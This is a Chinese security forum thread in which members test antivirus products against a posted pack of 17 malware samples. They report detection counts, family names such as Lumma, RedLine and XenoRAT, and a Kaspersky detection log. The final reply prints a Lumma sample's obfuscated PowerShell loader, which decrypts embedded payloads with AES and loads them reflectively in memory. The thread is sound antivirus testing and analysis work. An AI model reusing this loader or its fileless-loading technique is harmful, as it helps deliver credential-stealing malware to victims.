查看: 1619|回复: 18
收起左侧

[病毒样本] 龟包 240217 17X

[复制链接]
神龟Turmi
发表于 2024-2-17 21:32:42 | 显示全部楼层 |阅读模式
不知起什么名
发表于 2024-2-17 21:34:36 | 显示全部楼层
火绒 10x
夜莺算法
发表于 2024-2-17 21:37:03 | 显示全部楼层
ps目前所有ANKit代GUI的版本都是beta版,
KILL 14
MISS 3



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
hsks
发表于 2024-2-17 21:38:35 | 显示全部楼层
本帖最后由 hsks 于 2024-2-17 21:50 编辑

360 11X


自动机分拣后剩4X


双击lumma

stealc



redline




Total:16/17







本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +3 收起 理由
神龟Turmi + 3 小猫咪~~(痴汉脸)

查看全部评分

DisaPDB
发表于 2024-2-17 21:40:06 | 显示全部楼层
本帖最后由 DisaPDB 于 2024-2-17 21:43 编辑

KES RTP 2 left

TS-240217-08-Lumma-fb268b.exe miss
TS-240217-14-XenoRAT-659bd6.exe PDM杀
  1. 事件: 对象的备份副本已创建
  2. 应用程序: svchost
  3. 用户: DESKTOP-7PJ65GJ\mac
  4. 用户类型: 发起者
  5. 组件: 行为检测
  6. 结果说明: 已创建备份副本
  7. 类型: 木马
  8. 名称: PDM:Trojan.Win32.Generic
  9. 威胁级别: 高
  10. 对象类型: 进程
  11. 对象路径: C:\Users\mac\Desktop\TurtleSUSP-240217
  12. 对象名称: TS-240217-14-XenoRAT-659bd6.exe
  13. SHA256: F1E9F62CC55B275C853EBE69F0B19A221106D9F3C466A299B39C5ABC75111B50
  14. MD5: EA148B6C80A3AA88B66BCC0739F15C17
复制代码


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
GreatMOLA
发表于 2024-2-17 21:45:35 | 显示全部楼层
Dr.Web扫描

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Fadouse
发表于 2024-2-17 21:46:52 | 显示全部楼层
ESSP + Kaspersky Plus
解压杀12x
双击杀4x
剩余1x,有外联行为、沙箱运行自退。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
dght432
发表于 2024-2-17 21:49:42 来自手机 | 显示全部楼层
360双击勒索病毒miss

评分

参与人数 1人气 +2 收起 理由
hsks + 2 版区有你更精彩: )

查看全部评分

hsks
发表于 2024-2-17 21:51:16 | 显示全部楼层
本帖最后由 hsks 于 2024-2-17 21:53 编辑

讲一下lumma那个样本

exe-------downloader bat------------lumma
https://www.virustotal.com/gui/f ... 190948509/detection

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
DisaPDB
发表于 2024-2-17 22:30:15 | 显示全部楼层
hsks 发表于 2024-2-17 21:51
讲一下lumma那个样本

exe-------downloader bat------------lumma
  1. C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\jfpoi4u\putty.cmd';$htek='ElsHXBemsHXBensHXBtsHXBAtsHXB'.Replace('sHXB', ''),'GetGPMtCtGPMurtGPMrtGPMenttGPMProtGPMctGPMesstGPM'.Replace('tGPM', ''),'SpCKJTliCKJTtCKJT'.Replace('CKJT', ''),'FrVugYomVugYBasVugYe64VugYStrVugYinVugYgVugY'.Replace('VugY', ''),'EnYFCltYFClrYFClyPoYFClinYFCltYFCl'.Replace('YFCl', ''),'CredYoRadYoRtedYoRDdYoRedYoRcrdYoRyptdYoRordYoR'.Replace('dYoR', ''),'MiOrTaiiOrTnMiOrTodiOrTuleiOrT'.Replace('iOrT', ''),'ReYIZKadYIZKLiYIZKnesYIZK'.Replace('YIZK', ''),'CoUZugpyUZugTUZugoUZug'.Replace('UZug', ''),'ThquKrhquKanshquKforhquKmFhquKinhquKahquKlhquKBlohquKckhquK'.Replace('hquK', ''),'ChyqAsayqAsngyqAseEyqAsxtyqAsenyqAssyqAsionyqAs'.Replace('yqAs', ''),'DeHTLfcoHTLfmpHTLfresHTLfsHTLf'.Replace('HTLf', ''),'IXdEinXdEivoXdEikeXdEi'.Replace('XdEi', ''),'LovUioadvUio'.Replace('vUio', '');powershell -w hidden;function cIjfW($PJzVo){$BRxzh=[System.Security.Cryptography.Aes]::Create();$BRxzh.Mode=[System.Security.Cryptography.CipherMode]::CBC;$BRxzh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$BRxzh.Key=[System.Convert]::($htek[3])('w03tzxANj19a7PrSjz1zUFr0CYrXf7EfljFjP8CLKns=');$BRxzh.IV=[System.Convert]::($htek[3])('eJ8tgpaif+FBtXcs8uy/9w==');$TdBnb=$BRxzh.($htek[5])();$GkFrN=$TdBnb.($htek[9])($PJzVo,0,$PJzVo.Length);$TdBnb.Dispose();$BRxzh.Dispose();$GkFrN;}function TiynM($PJzVo){$bDZNq=New-Object System.IO.MemoryStream(,$PJzVo);$JDhzj=New-Object System.IO.MemoryStream;$HrjFA=New-Object System.IO.Compression.GZipStream($bDZNq,[IO.Compression.CompressionMode]::($htek[11]));$HrjFA.($htek[8])($JDhzj);$HrjFA.Dispose();$bDZNq.Dispose();$JDhzj.Dispose();$JDhzj.ToArray();}$CABTf=[System.IO.File]::($htek[7])([Console]::Title);$ogfxv=TiynM (cIjfW ([Convert]::($htek[3])([System.Linq.Enumerable]::($htek[0])($CABTf, 5).Substring(2))));$mcKOZ=TiynM (cIjfW ([Convert]::($htek[3])([System.Linq.Enumerable]::($htek[0])($CABTf, 6).Substring(2))));[System.Reflection.Assembly]::($htek[13])([byte[]]$mcKOZ).($htek[4]).($htek[12])($null,$null);[System.Reflection.Assembly]::($htek[13])([byte[]]$ogfxv).($htek[4]).($htek[12])($null,$null); "
复制代码

评分

参与人数 1人气 +1 收起 理由
hsks + 1

查看全部评分

您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-28 18:48 , Processed in 0.128262 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表